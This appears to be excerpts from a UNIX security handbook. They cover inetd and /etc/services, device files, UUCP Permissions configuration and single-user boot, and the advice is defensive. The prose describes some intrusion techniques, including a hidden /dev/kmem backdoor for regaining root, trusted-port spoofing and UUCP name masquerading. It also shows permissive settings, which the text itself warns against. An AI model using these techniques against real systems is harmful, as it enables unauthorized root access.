TCP/IP protocol suite and the <strong>UNIX</strong> operating system themselves have few inherent security problems,<br />

many of the problems that do exist have a strange way of showing themselves when computers running<br />

the <strong>UNIX</strong> operating system are put on the global network.<br />

The reason for caution has a lot to do with the flexibility of both <strong>UNIX</strong> and the <strong>Internet</strong>. A network<br />

connection gives users on the network dozens of different ways to form connections with your computer:<br />

they can send it mail, they can access a WWW server, and they can look up the names and addresses of<br />

your users. Unfortunately, each of these services can contain potential security holes, both as the result of<br />

bugs, and because of fundamental shortcomings in the services themselves.<br />

Over the years many security problems have been discovered in network services, and workable solutions<br />

have been found. Unfortunately, some <strong>UNIX</strong> vendors have been slow to incorporate these security-related<br />

fixes into their standard offerings. If you are the system manager of any <strong>UNIX</strong> computer that is connected<br />

to a network, you must therefore be aware of the security failings of your own computer, and take<br />

appropriate measures to counteract them. To do so, you first need to understand how the <strong>UNIX</strong> operating<br />

system works with the <strong>Internet</strong>.<br />

This chapter is not a definitive description of the TCP/IP services offered by <strong>UNIX</strong>. Instead, it presents a<br />

brief introduction to the various services, and describes security-related concerns of each. For a more<br />

definitive discussion, we recommend the following books:<br />

● Building Internet Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky (O'Reilly & Associates, 1995).

● Managing Internet Information Services, by Cricket Liu, Jerry Peek, Russ Jones, Bryan Buus, and Adrian Nye (O'Reilly & Associates, 1994).

● DNS and BIND, by Paul Albitz and Cricket Liu (O'Reilly & Associates, 1992).

● sendmail, by Bryan Costales, with Eric Allman and Neil Rickert (O'Reilly & Associates, 1993).

● UNIX Network Programming, by W. Richard Stevens (Prentice Hall, 1990).

17.1 Understanding <strong>UNIX</strong> <strong>Internet</strong> Servers<br />

Most <strong>UNIX</strong> network services are provided by individual programs called servers. For a server to operate,<br />

it must be assigned a protocol (TCP or UDP), be assigned a port number, and be started when the system<br />

boots or as needed, as we'll describe in "Starting the Servers" below.<br />

17.1.1 The /etc/services File<br />

The /etc/services file is a simple text database. Each line of the /etc/services file consists of a service

name, a network port number, a protocol name, and a list of aliases. A rather extensive list of <strong>Internet</strong><br />

services, including their uses on <strong>UNIX</strong> systems, their security implications, and our recommendations as<br />

to whether or not you should run them, appears in Appendix G, Table of IP Services.<br />

The /etc/services file is referenced by both <strong>Internet</strong> client programs and servers. The information in the<br />

/etc/services file comes from <strong>Internet</strong> RFCs[1] and other sources. Some of the services listed in the<br />

/etc/services file are no longer in widespread use; nevertheless, their names still appear in the file to<br />

prevent the accidental reassignment of their ports in the event that the services are still used somewhere on<br />

the global network.<br />

[1] RFC stands for Request For Comment. The RFCs describe many of the actual standards,<br />

proposed standards, and operational characteristics of the <strong>Internet</strong>. There are many online<br />

sources for obtaining the RFCs.<br />

The following is an excerpt from the /etc/services file that specifies the Telnet, SMTP, and Network Time<br />

Protocol (NTP) services:<br />

# /etc/services<br />

#<br />

telnet 23 /tcp<br />

smtp 25 /tcp mail<br />

time 37 /udp timeserver<br />

...<br />

UNIX servers should determine their port numbers by looking up each service in the /etc/services file using the library routine getservbyname(). The /etc/services file can be supplemented or replaced by distributed database systems such as NIS, NIS+, Netinfo, or DCE. Most of these systems patch the system's getservbyname() routine, so that they are transparent to the application.
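For example, a program can look up the SMTP port with a few lines of C (a minimal sketch):

#include <stdio.h>
#include <netdb.h>        /* getservbyname(), struct servent */
#include <netinet/in.h>   /* ntohs() */

int main(void)
{
    struct servent *sp = getservbyname("smtp", "tcp");

    if (sp == NULL) {
        fprintf(stderr, "smtp/tcp: unknown service\n");
        return 1;
    }
    /* s_port is stored in network byte order */
    printf("smtp/tcp is port %d\n", ntohs(sp->s_port));
    return 0;
}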

Trusted Ports<br />

Ports in the range 0 to 1023 are sometimes referred to as trusted ports. On <strong>UNIX</strong>, these ports are restricted<br />


to the superuser; a program must be running as root to listen to a trusted port or to originate a connection<br />

from any of these port numbers. (Note that any user can connect to a trusted port.)<br />
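You can see this restriction with a few lines of code. Run as an ordinary user, the bind() call below fails (typically with "Permission denied"); run as the superuser, it succeeds. This is only an illustrative sketch:

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sin;

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons(1021);        /* an arbitrary port below 1024 */

    if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        perror("bind to port 1021");   /* fails unless running as root */
    else
        printf("bound to port 1021\n");
    return 0;
}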

The concept of trusted ports is intended to prevent a regular user from obtaining privileged information.<br />

For example, if a regular user could write a program that listened to port 23, that program could<br />

masquerade as a Telnet server, receiving connections from unsuspecting users, and obtain their passwords.<br />

This idea of trusted ports is a <strong>UNIX</strong> convention. It is not part of the <strong>Internet</strong> standard, and manufacturers<br />

are not bound to observe this protocol. It is simply the way that the designers of <strong>UNIX</strong> network services<br />

decided to approach the problem.<br />

Thus, trusted ports are not very trustworthy. Using a non-UNIX machine, such as an IBM PC with an

Ethernet board in place, it is possible to spoof <strong>UNIX</strong> network software by sending packets from, or<br />

listening to, low-numbered trusted ports.<br />

Some programmers bypass getservbyname() and simply hard-code the port number into their programs.

Thus, if you make a change to a program's port number in the /etc/services file, the server may or may not<br />

change the port to which it is listening. This can result in significant problems if a change is necessary,<br />

although well-known services seldom change their ports.<br />

17.1.2 Starting the Servers<br />

There are fundamentally two kinds of <strong>UNIX</strong> servers:<br />

● Servers that are always running. These servers are started automatically from the /etc/rc* files when the operating system starts up.[2] Servers started at boot time are usually the servers that should provide rapid responses to user requests, must handle many network requests from a single server process, or both. Servers in this category include nfsd (Network Filesystem daemon) and sendmail.

[2] On System V-derived operating systems, such as Solaris 2.x, these servers are usually started by an entry in a file located inside the /etc/rc2.d/ directory.

● Servers that are run only when needed. These servers are usually started from inetd, the UNIX "Internet" daemon. inetd is a flexible program that can listen to dozens of Internet ports and automatically start the appropriate daemon as needed. Servers started by inetd include popper (Post Office Protocol daemon) and fingerd (the finger daemon).

Servers that are always running are usually started by a command in the /etc/rc* files. For example, the<br />

lines in the /etc/rc file that start up the Simple Mail Transfer Protocol (SMTP) server look like this:

if [ -f /usr/lib/sendmail -a -f /etc/sendmail/sendmail.cf ]; then<br />

/usr/lib/sendmail -bd -q1h && (echo -n ' sendmail') > /dev/console<br />

fi<br />

This example checks for the existence of /usr/lib/sendmail and the program's control file,<br />

/etc/sendmail/sendmail.cf. If the two files exist, /etc/rc runs the sendmail program and prints the word<br />

"sendmail" on the system console. After the program is running, sendmail will bind to TCP/IP port<br />

number 25 and listen for connections.[3]<br />

[3] The option -bd makes the sendmail program "be a daemon" while the option -q1h causes<br />

the program to process the mail queue every hour.<br />


Each time the sendmail program receives a connection, it uses the fork() system call to create a new

process to handle that connection. The original sendmail process then continues listening for new<br />

connections.<br />
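This accept-and-fork pattern is common to most standalone UNIX servers. Stripped of error handling and of everything specific to sendmail, the main loop looks roughly like this sketch:

#include <unistd.h>
#include <sys/socket.h>

/* "listener" is a socket that has already been bound to the service's port
 * and placed in the listening state with listen(). */
void serve_forever(int listener)
{
    for (;;) {
        int client = accept(listener, NULL, NULL);
        if (client < 0)
            continue;                  /* transient error; keep listening */
        if (fork() == 0) {             /* child: handle this one connection */
            /* ... read the request and send the reply on "client" ... */
            close(client);
            _exit(0);
        }
        close(client);                 /* parent: go back to accept() */
    }
}

A production server would also arrange to reap its finished children (for example, by catching SIGCHLD) so that they do not linger as zombie processes.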

17.1.3 The /etc/inetd Program<br />

The first version of <strong>UNIX</strong> to support the <strong>Internet</strong>, BSD 4.2, set a different server program running for<br />

every network service.[4] As the number of services grew in the mid-1980s, <strong>UNIX</strong> systems started having<br />

more and more server programs sleeping in the background, waiting for network connections. Although<br />

the servers were sleeping, they nevertheless consumed valuable system resources such as process table<br />

entries and swap space. Eventually, a single program called /etc/inetd (the <strong>Internet</strong> daemon) was<br />

developed, which listened on many network ports at a time and ran the appropriate TCP-based or<br />

UDP-based server on demand when a connection was received.<br />

[4] BSD 4.1a was an early test release of <strong>UNIX</strong> with TCP/IP support. BSD 4.2, released in<br />

September 1983, was the first non-test release with TCP/IP support.<br />

inetd is run at boot time as part of the start-up procedure. When it starts execution, it examines the<br />

contents of the /etc/inetd.conf file to determine which network services it is supposed to manage. inetd<br />

uses the bind() call to attach itself to many network ports and then uses the select() call to cause<br />

notification when a connection is made on any of the ports.<br />

A sample inetd.conf file might look like this:<br />

# @(#)inetd.conf 1.1 87/08/12 3.2/4.3NFSSRC<br />

#<br />

# <strong>Internet</strong> server configuration database<br />

#<br />

ftp stream tcp nowait root /usr/etc/ftpd ftpd<br />

telnet stream tcp nowait root /usr/etc/telnetd telnetd<br />

shell stream tcp nowait root /usr/etc/rshd rshd<br />

login stream tcp nowait root /usr/etc/rlogind rlogind<br />

exec stream tcp nowait root /usr/etc/rexecd rexecd<br />

uucp stream tcp nowait uucp /usr/etc/uucpd uucpd<br />

finger stream tcp nowait nobody /usr/etc/fingerd fingerd<br />

tftp dgram udp wait nobody /usr/etc/tftpd tftpd<br />

comsat dgram udp wait root /usr/etc/comsat comsat<br />

talk dgram udp wait root /usr/etc/talkd talkd<br />

ntalk dgram udp wait root /usr/etc/ntalkd ntalkd<br />

echo stream tcp nowait root internal<br />

discard stream tcp nowait root internal<br />

chargen stream tcp nowait root internal<br />

daytime stream tcp nowait root internal<br />

time stream tcp nowait root internal<br />

echo dgram udp wait root internal<br />

discard dgram udp wait root internal<br />

chargen dgram udp wait root internal<br />


daytime dgram udp wait root internal<br />

time dgram udp wait root internal<br />

Each line contains at least six fields, separated by spaces or tabs:<br />

Service name<br />

The service name that appears in the /etc/services file. inetd uses this name to determine which port<br />

number it should listen to.<br />

Socket type<br />

Whether the service expects to communicate via a stream or on a datagram basis.<br />

Protocol type<br />

Whether the service expects to use TCP- or UDP-based communications. TCP is used with stream<br />

sockets, while UDP is used with dgram, or datagrams.<br />

Wait/nowait

If the entry is "wait," the server is expected to process all subsequent connections received on the socket. If "nowait" is specified, inetd will fork() and exec() a new server process for each additional datagram or connection request received. Most UDP services are wait, while most TCP services are nowait, although this is not a firm rule. Although some man pages indicate that this field is only used with datagram sockets, the field is actually interpreted for all services.

User

Specifies the UID that the server process is to be run as. This can be root (UID 0), daemon (UID 1), nobody (often UID -2 or 65534), or an actual user of your system. This field allows server processes to be run with fewer permissions than root, to minimize the damage that could be done if a security hole is discovered in a server program.

Command name and arguments<br />

The remaining arguments specify the command name to execute and the arguments that the<br />

command is passed, starting with argv[0].<br />
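Putting the fields together, the finger line from the sample file above breaks down like this:

finger              service name (looked up in /etc/services)
stream              socket type
tcp                 protocol type
nowait              start a new fingerd for each connection
nobody              UID under which the server runs
/usr/etc/fingerd    program for inetd to execute
fingerd             arguments passed to the program, starting with argv[0]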

Some services, like echo, time, and discard, are listed as "internal." These services are fairly trivial, and<br />

they are handled internally by inetd rather than requiring a special program to be run. Although these<br />

services are useful for testing, they can also be used for denial of service attacks. You should disable them.<br />

You should routinely check the entries in the /etc/inetd.conf file and verify that you understand why each<br />

of the services in the file is being offered to the <strong>Internet</strong>. Sometimes, when attackers break into systems,<br />

they create new services to make future break-ins easier. If you cannot explain why a service is being<br />

offered at your site, you may wish to disable it until you know what purpose it serves.<br />



Chapter 5

The UNIX Filesystem

5.6 Device Files

Computer systems usually have peripheral devices attached to them. These devices may be involved with I/O<br />

(terminals, printers, modems); they may involve mass storage (disks, tapes); and they may have other specialized<br />

functions. The <strong>UNIX</strong> paradigm for devices is to treat each one as a file, some with special characteristics.<br />

<strong>UNIX</strong> devices are represented as inodes, identical to files. The inodes represent either a character device or a block<br />

device (described in the sidebar). Each device is also designated by a major device number, indicating the type of<br />

device, and a minor device number, indicating which one of many similar devices the inode represents. For instance,<br />

the partitions of a physical disk will all have the same major device number, but different minor device numbers. For<br />

a serial card, the minor device number may represent which port number is in use. When a program reads from or<br />

writes to a device file, the kernel turns the request into an I/O operation with the appropriate device, using the<br />

major/minor device numbers as parameters to indicate which device to access.<br />
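You can display a device file's type and its major and minor numbers with ls -l, or from a program with stat(), as in this small sketch (the header that defines the major() and minor() macros varies from system to system):

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
/* On some systems the major() and minor() macros are defined in
   <sys/sysmacros.h> or <sys/mkdev.h> rather than <sys/types.h>. */

int main(int argc, char *argv[])
{
    struct stat st;

    if (argc != 2 || stat(argv[1], &st) < 0) {
        fprintf(stderr, "usage: devinfo device-file\n");
        return 1;
    }
    if (S_ISCHR(st.st_mode) || S_ISBLK(st.st_mode))
        printf("%s: %s device, major %d, minor %d\n", argv[1],
               S_ISCHR(st.st_mode) ? "character" : "block",
               (int) major(st.st_rdev), (int) minor(st.st_rdev));
    else
        printf("%s is not a device file\n", argv[1]);
    return 0;
}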

Block Vs. Character Devices<br />

Most devices in <strong>UNIX</strong> are referenced as character devices. These are also known as raw devices. The reason for the<br />

name "raw device" is because that is what you get - raw access to the device. You must make your read and write<br />

calls to the device file in the natural transfer units of the device. Thus, you probably read and write single characters<br />

at a time to a terminal device, but you need to read and write whole sectors to a disk device. Attempts to read fewer (or more) bytes than the natural block size result in an error, because the raw device doesn't work that way.

When accessing the filesystem, we often want to read or write only the next few bytes of a file at a time. If we used<br />

the raw device, it would mean that to write a few bytes to a file, we would need to read in the whole sector off disk<br />

containing those bytes, modify the ones we want to write, and then write the whole sector back out. Now consider<br />

every user doing that as they update each file. That would be a lot of disk traffic!<br />

The solution is to make efficient use of caching. Block devices are cached versions of character devices. When we<br />

make reference to a few bytes of the block device, the kernel reads the corresponding sector into a buffer in memory,<br />

and then copies the characters out of the buffer that we wanted. The next time we reference the same sector, to read<br />

from or write to, the access goes to the cached version in memory. If we have enough memory, most of the files we<br />

will access can all be kept in buffers, resulting in much better performance.<br />

There is a drawback to block devices, however. If the system crashes before modified buffers get written back out to<br />

disk, the changes our programs made won't be there when the system reboots. Thus, we need to periodically flush the<br />

modified buffers out to disk. That is effectively what the sync() system call does: schedule the buffers to be flushed to disk. Most systems have a daemon (such as update or fsflush) that issues a sync() call every 30 or 60 seconds to make sure the disk is mostly up to date. If the system goes down between sync() calls, we need to run a program such as fsck or checkfsys to make certain that no directories whose buffers were in memory were left in an inconsistent state.

<strong>UNIX</strong> usually has some special device files that don't correspond to physical devices. The /dev/null device simply<br />

discards anything written to it, and nothing can ever be read from it - a process that attempts to do so gets an<br />

immediate end-of-file condition. Writing to the /dev/console device results in output being printed on the system<br />


console terminal. And reading or writing to the /dev/kmem device accesses the kernel's memory. Devices such as<br />

these are often referred to as pseudo-devices.<br />

Device files are one of the reasons <strong>UNIX</strong> is so flexible and popular - they allow programmers to write their programs<br />

in a general way without having to know the actual type of device being used. Unfortunately, they also can present a<br />

major security hazard when an attacker is able to access them in an unauthorized way.<br />

For instance, if attackers can read or write to the /dev/kmem device, they may be able to alter their priority, UID, or<br />

other attributes of their process. They could also scribble garbage data over important data structures and crash the<br />

system. Similarly, access to disk devices, tape devices, network devices, and terminals being used by others all can<br />

lead to problems. Access to your screen buffer might allow an attacker to read what is displayed on your screen.<br />

Access to your audio devices might allow an attacker to eavesdrop on your office without your knowing about it.<br />

In standard configurations of <strong>UNIX</strong>, all the standard device files are located in the directory /dev. There is usually a<br />

script (e.g., MAKEDEV) in that directory that can be run to create the appropriate device files and set the correct<br />

permissions. A few devices, such as /dev/null, /dev/tty, and /dev/console, should all be world-writable, but most of<br />

the rest should be unreadable and unwritable by regular users. Note that on some System V systems, many of the<br />

files in /dev are symbolic links to files in the /devices directory: those are the files whose permissions you need to<br />

check.<br />

Check the permissions on these files when you install the system, and periodically thereafter. If any permission is<br />

changed, or any device is accessible to all users, you should investigate. This research should be included as part of<br />

your checklists.<br />

Unauthorized Device Files

Although device files are normally located in the /dev directory, they may, in fact, be anywhere on your system. A common method used by system crackers is to get on the system as the superuser and then create a writable device file in a hidden directory, such as the /dev/kmem device hidden in /usr/lib and named to resemble one of the libraries. Later, if they wish to become superuser again, they know the correct locations in /dev/kmem to alter with a symbolic debugger or custom program to allow them that access. For instance, by changing the code for a certain routine to always return true, they can execute su to become root without needing a password. Then, they set the routine back to normal.

You should periodically scan your disks for unauthorized device files. The ncheck command, mentioned earlier, will print the names of all device files when run with the -s option. Alternatively, you can execute the following:

# find / \( -type c -o -type b \) -exec ls -l {} \;

If you have NFS-mounted directories, use this version of the script:

# find / \( -local -o -prune \) \( -type c -o -type b \) -exec ls -l {} \;

Note that some versions of NFS allow users on remote machines running as root to create device files on exported volumes. [27] This is a major problem. Be very careful about exporting writable directories using NFS (see Chapter 20, for more information).

[27] Of course, these modifications cannot be made if the filesystem is exported read only.
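As an illustration only - export file syntax differs widely between NFS implementations, so consult your vendor's exports or share documentation - a SunOS-style /etc/exports entry that exports a filesystem read-only might look like:

/usr/local -ro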

Not Everything Is a File or a Device!

The two commands:

find / \! -type f -a \! -type d -exec ls -l {} \;

and:

find / \( -type c -o -type b \) -exec ls -l {} \;

are not equivalent!

The first command prints all of the entries in the filesystem that are not files or directories. The second prints all of the entries in the filesystem that are either character or block devices.

Why aren't these commands the same? Because there are other things that can be in a filesystem that are neither files nor directories. These include:

●   Symbolic links

●   Sockets

●   Named pipes (FIFOs)



Chapter 15
UUCP

15.5 Security in BNU UUCP

In BNU, the Permissions file replaces both the Version 2 USERFILE and L.cmds files. Permissions provides additional protection and finer control over the UUCP system. A second file called remote.unknown controls whether or not an unknown system (that is, one not listed in your Systems file) can log in (assuming that the remote system knows a valid UUCP login name and password).
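On many BNU implementations, remote.unknown is a shell script that logs and refuses calls from unknown systems, and it does that job only while it remains executable; details vary by vendor, so check your documentation. One quick way to see how your system is set up (the path below is typical but not universal; some systems keep it in /etc/uucp):

# ls -l /usr/lib/uucp/remote.unknown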

15.5.1 Permissions File

The Permissions file consists of commands, possibly multi-line, and often separated by blank lines, that are used to determine what users and remote machines can and cannot do with the UUCP system.

Here is a sample Permissions file. For now, don't worry about what all the commands mean: we'll explain them shortly.

LOGNAME=Ugarp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic
MACHINE=garp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic

15.5.1.1 Starting up

When uucico starts, it scans the Permissions file to determine which commands the remote machine can execute and which files can be accessed.

When uucico calls another system, it looks for a block of commands containing a MACHINE=system statement, where system is the name of the machine that it is calling. For example, if you are calling the machine idr, it looks for a line in the form:

MACHINE=idr

When uucico is started by another computer logging in to your local machine, uucico looks for a block of commands containing a LOGNAME=loginname statement, where loginname is the username with which the remote computer has logged in. For example, if the remote computer has logged in with the username Uidr, the uucico running on your computer looks for a block of commands with a line containing this statement:

LOGNAME=Uidr

Other commands in the command block specify what the remote machine can do:

15.5.1.2 Name-value pairs

In BNU terminology, the MACHINE=, LOGNAME=, READ=, and WRITE= statements are called "name-value pairs." This name comes from their format:

name=value

To specify a block of commands for use when calling the machine bread, you would use a command in the form:

MACHINE=bread

You can specify multiple values by separating them with colons (:). For example:

MACHINE=bread:butter:circus

15.5.1.3 A Sample Permissions file

Here is the sample Permissions file again:

LOGNAME=Ugarp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic
MACHINE=garp READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic

This Permissions file gives the machine garp permission to read and write files in the /usr/spool/uucppublic directory. It also allows any remote computer logging in with the UUCP login Ugarp to read and write files in that directory.

Here is another example:

# If garp calls us, only allow access to uucppublic
#
LOGNAME=Ugarp MACHINE=garp READ=/usr/spool/uucppublic \
WRITE=/usr/spool/uucppublic

This command allows the machine garp to read or write any file in /usr/spool/uucppublic, but only when the machine garp logs into your computer using the UUCP login Ugarp. Notice in this example that the backslash (\) character is used to continue the entry on the following line. To include a comment, begin a line with a hash mark (#).

You can combine a LOGNAME= and a MACHINE= entry in a single line:

# Let garp have lots of access
#
LOGNAME=Ugarp MACHINE=garp READ=/ WRITE=/ REQUEST=yes SENDFILES=yes

The REQUEST=yes name-value pair allows garp to request files from your machine. The SENDFILES=yes pair allows you to send files to garp even when it initiates the call to you.

If you assign a unique login ID for each UUCP system with which you communicate, then LOGNAME= and MACHINE= can each be thought of as controlling one direction of the file transfer operation. But if the same login ID is shared by several UUCP systems, they will all be covered by the same LOGNAME= entry when they call you, even though they will each be covered by their own MACHINE= entry when you call them.
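As a hypothetical illustration of that split (the login name Uclients is invented here; bread and butter are the example machine names used earlier), a shared login covered by one LOGNAME= block, with a separate MACHINE= block for each outbound connection, might look like:

LOGNAME=Uclients READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic
MACHINE=bread READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic
MACHINE=butter READ=/usr/spool/uucppublic WRITE=/usr/spool/uucppublic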


15.5.2 Permissions Commands

BNU UUCP has 13 different commands that can be included in the Permissions file. These commands help provide the flexibility that BNU allows over UUCP connections. These commands are placed in the same command block as the MACHINE= and LOGNAME= commands described above. You can specify as many commands in a block as you wish.

A MACHINE= entry in the Permissions file is used when a specific remote site is contacted by the local computer. Specify a MACHINE=OTHER entry to define a Permissions entry for any machine that is not explicitly referenced.

For example:

# Setup for when we call garp
MACHINE=garp

LOGNAME= is used when a remote site logs in with a specific login name. Each UUCP login name should appear in only one LOGNAME entry.

For example:

# Setup login for when garp calls
LOGNAME=Ugarp

You can specify a LOGNAME=OTHER entry to define a Permissions entry for any machine that is not explicitly referenced.

For example:

# Setup login for everybody else
LOGNAME=OTHER

REQUEST= specifies whether the remote system can request file transfers with your computer. The default is "no," which means that files can be transferred only if the uucp command is issued on your computer.

For example:

# Let garp request files
MACHINE=garp LOGNAME=Ugarp REQUEST=YES

SENDFILES= specifies whether files that are queued on the local system should be sent to the calling system when it contacts the local system. The default is "call," which means "no, don't send any queued files when the other computer calls me; hold the files until I call the other computer." The reason for this option is that you are more sure of the identity of a remote computer when you call it than when it calls you. If you set this entry to "yes," all of the queued files will be sent whenever the remote system calls you, or when you call it, whichever happens first. This option makes sense only with the LOGNAME entries. If this option is used with a MACHINE entry, it is ignored.

For example:

# Send files to garp when it calls us
LOGNAME=Ugarp SENDFILES=YES

PUBDIR= allows you to specify directories for public access. The default is /usr/spool/uucppublic.


For example:

# Let garp use two public directories
MACHINE=garp LOGNAME=Ugarp READ=/ WRITE=/ \
PUBDIR=/usr/spool/uucppublic:/usr/spool/garp

READ= and WRITE= specify the directories that uucico can use to read from or write to. The default is the PUBDIR.

You can specify access to all of the temporary directories on your system with the following command:

# Let garp read lots
MACHINE=garp LOGNAME=Ugarp \
READ=/usr/spool/uucppublic:/tmp:/usr/tmp \
WRITE=/usr/spool/uucppublic:/tmp:/usr/tmp

You can let garp access every file on your system with the command:

# Let garp read even more
MACHINE=garp LOGNAME=Ugarp \
READ=/ WRITE=/

We don't recommend this!

NOREAD= and NOWRITE= specify directories that uucico may not read from or write to, even if those directories are included in a READ or a WRITE command. You might want to use the NOREAD and NOWRITE directives to exclude directories like /etc and /usr/lib/uucp, so that there is no way that people on machines connected to yours via UUCP can read files like /etc/passwd and /usr/lib/uucp/Systems.

For example:

MACHINE=garp LOGNAME=Ugarp \
READ=/ \
WRITE=/usr/spool/uucppublic:/tmp:/usr/tmp \
NOREAD=/etc:/usr/lib/uucp \
NOWRITE=/etc:/usr/lib/uucp

CALLBACK= specifies whether or not the local system must call back the calling system before file transfer can occur. The default is "no." CALLBACK enhances security in some environments. Normally, it is possible with UUCP for one machine to masquerade as another. If you call a remote machine, however, it is unlikely that such a masquerade is taking place. CALLBACK is also useful for situations where one computer is equipped with a low-cost, long-distance telephone line, so that the majority of the call will be billed at the lower rate. The CALLBACK command makes sense only for LOGNAME entries. If two sites have CALLBACK=yes specified for each other, the machines will continually call back and forth, but no data will be transferred.

For example:

# We'll call garp
LOGNAME=Ugarp CALLBACK=YES

For further information, see our comments on callback in Chapter 14.

COMMANDS= specifies commands that the remote system can execute on the local computer. When uuxqt executes a command, it searches the Permissions file for the MACHINE= entry associated with the particular system from which the commands were sent. The MACHINE= entry is the one that is used, even if the uucico connection was originated by the remote machine and a different LOGNAME= entry is being used.

The default value for COMMANDS is compiled into your version of uuxqt; if you have source code, it is defined in the file params.h. The COMMANDS= entry often has the single form:

COMMANDS=rmail

You can specify a full pathname:

COMMANDS=rmail:/usr/bin/rnews:/usr/ucb/lpr

You can specify the value ALL, which allows any command to be executed:

COMMANDS=ALL

You probably don't want to specify ALL unless you have complete control over all of the machines that you connect to with UUCP.

For example:

# Let garp send us mail, netnews, and print files
MACHINE=garp LOGNAME=Ugarp \
COMMANDS=rmail:rnews:lpr

VALIDATE= is used with a LOGNAME entry to provide a small additional degree of security. Specifying a machine name (or many machine names) in the VALIDATE= entry will allow that UUCP login to be used only by those machines.

For example:

# Let's be sure about garp
LOGNAME=Ugarp VALIDATE=garp

This command prevents any UUCP computer other than garp from using the Ugarp login. Of course, anybody interested in using UUCP to break into your computer could just as easily change their UUCP name to be garp, so this command really doesn't provide very much security.

MYNAME= can be used to change the UUCP name of your computer when it initiates a UUCP connection. This command is useful for testing. It is also helpful when you use a generic name for your site, but it is not the same as your UUCP machine name. For example:

# When we call garp, present ourselves as bigcorp
MACHINE=garp \
MYNAME=bigcorp

Got that? You can make your computer have any UUCP name that you want! Anybody else can do this as well, so be careful if you let any machine execute commands (specified in the COMMANDS= entry) that might be considered potentially unsafe (e.g., rm, shutdown).

NOTE: If you wish to run a secure system, the directory /usr/lib/uucp (or /etc/uucp) must not be in the WRITE directory list (or it must be in the NOWRITE list)! If users from the outside are allowed to transfer into these directories, they can change the Permissions file to allow them to execute any command that they wish. Similarly, local users can use the uucp command to change these files, and then subvert UUCP. Giving all access from the / directory is also dangerous - if you do, people outside your organization can subvert your system easily.

Furthermore, the home directory for the uucp user should not be in the /usr/spool/uucp/uucppublic directory, or in any other directory that can be written to by a uucp user. Doing so allows an outside user to subvert the system.

15.5.3 uucheck: Checking Your Permissions File

Verifying the Permissions file can be tricky. To help with this important task, BNU includes a program called uucheck that does it for you.

Normally, the uucheck program only reports security problems. However, it has a -v option which causes the program to produce a full report.

Below is a sample Permissions file that lets the computer garp (or anybody using the UUCP login Ugarp) access a variety of files and execute a number of commands:

# cat Permissions
MACHINE=garp LOGNAME=Ugarp \
COMMANDS=rmail:rnews:uucp \
READ=/usr/spool/uucppublic:/usr/tmp \
WRITE=/usr/spool/uucppublic:/usr/tmp \
SENDFILES=yes REQUEST=no

Here is the output from the uucheck program run with the above Permissions file:

Example 15.1: Verifying the Sample UUCP Permissions File

# /usr/lib/uucp/uucheck -v
*** uucheck: Check Required Files and Directories
*** uucheck: Directories Check Complete
*** uucheck: Check /etc/uucp/Permissions file
** LOGNAME PHASE (when they call us)

When a system logs in as: (Ugarp)
    We DO NOT allow them to request files.
    We WILL send files queued for them on this call.
    They can send files to
        /usr/spool/uucppublic
        /usr/tmp
    Sent files will be created in /var/spool/uucp
        before they are copied to the target directory.
    Myname for the conversation will be sun.
    PUBDIR for the conversation will be /usr/spool/uucppublic.

** MACHINE PHASE (when we call or execute their uux requests)

When we call system(s): (garp)
    We DO NOT allow them to request files.
    They can send files to
        /usr/spool/uucppublic
        /usr/tmp
    Sent files will be created in /var/spool/uucp
        before they are copied to the target directory.
    Myname for the conversation will be sun.
    PUBDIR for the conversation will be /usr/spool/uucppublic.
Machine(s): (garp)
    CAN execute the following commands:
        command (rmail), fullname (rmail)
        command (rnews), fullname (rnews)
        command (uucp), fullname (uucp)
*** uucheck: /etc/uucp/Permissions Check Complete
#



Appendix C
UNIX Processes

C.5 Starting Up UNIX and Logging In

Most modern computers are equipped with a certain amount of read-only memory (ROM) that contains the first program that a computer runs when it is turned on. Typically, this ROM will perform a small number of system diagnostic tests to ensure that the system is operating properly, after which it will load another program from a disk drive or from the network. This process is called bootstrapping.

Although every UNIX system bootstraps in a slightly different fashion, usually the ROM monitor loads a small program called boot that is kept at a known location on the hard disk (or on the network). The boot program then loads the UNIX kernel into the computer and starts running it.

After the kernel initializes itself and determines the machine's configuration, it creates a process with a PID of 1 which runs the /etc/init program.
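You can confirm this on a running system; as one hedged example (ps option syntax differs between families - this form assumes a System V-style ps, while BSD-derived systems use ps ax instead), pull process 1 out of a full listing:

# ps -ef | awk '$2 == 1'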

C.5.1 Process #1: /etc/init

The program /etc/init finishes the task of starting up the computer system and lets users log in.

Some UNIX systems can be booted in a single-user mode. If UNIX is booted in single-user mode, the init program forks and runs the standard UNIX shell, /bin/sh, on the system console. This shell, run as superuser, gives the person sitting at the console total access to the system. It also allows nobody else access to the system; no network daemons are started unless root chooses to start them.

Some systems can be set up to require a password to boot in single-user mode, while others cannot. Many workstations - including those made by Sun Microsystems - allow you to set a special user password using the boot monitor in ROM. Single-user mode is designed to allow the resurrection of a computer with a partially corrupted filesystem; if the /etc/passwd file is deleted, the only way to rebuild it would be to bring the computer up in single-user mode. Unfortunately, single-user mode is also a security hole, because it allows unprivileged people to execute privileged commands simply by typing them on the system console; computers that can be brought up in single-user mode should have their consoles in a place that is physically secure. On many Berkeley-derived systems, changing the line in the /etc/ttytab file for the console so that it is not marked as "secure" will force the user to provide a password when booting in single-user mode.

Some UNIX systems can also be booted in a maintenance mode. Maintenance mode is similar to single-user mode, except that the root password must first be typed on the system console.

NOTE: Do not depend on the maintenance mode to prevent people from booting your computers in single-user mode. Most computers can be booted from CD-ROMs or floppy disks, allowing anyone with even the most modest technical knowledge to gain superuser privileges if they have physical access to the system.

